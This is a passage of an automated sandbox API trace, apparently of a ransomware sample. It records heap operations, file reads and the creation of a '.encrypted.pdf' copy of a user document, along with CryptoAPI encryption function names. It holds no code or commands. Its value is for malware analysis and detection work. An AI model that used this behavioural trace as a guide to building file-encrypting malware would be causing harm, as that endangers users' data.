"c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x")) returned 0x10 [0035.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0035.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0035.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0035.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.629] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.encrypted.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\lckicvhsnu_6z.encrypted.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0035.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0035.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.632] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0035.632] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0035.632] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0035.632] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0035.633] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0035.633] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0035.635] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x7325, lpOverlapped=0x0) returned 1 [0035.636] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0035.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17325) returned 0x955018 [0035.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0035.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0035.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17325) returned 0x96c348 [0035.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.639] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17325) returned 0x955018 [0035.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0035.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.640] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0035.640] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.640] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0035.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17325) returned 0x955018 [0035.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0035.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0035.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0035.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0035.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0035.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbe0 [0035.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0035.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0035.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0035.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17325) returned 0x88ffb0 [0035.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0035.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0035.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0035.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0035.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0035.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0035.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0035.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0035.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0035.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0035.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0035.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.644] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0035.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da358 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0035.644] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0035.644] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.645] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0035.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.645] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.646] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0035.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0035.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.647] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0035.647] PeekMessageW (in: 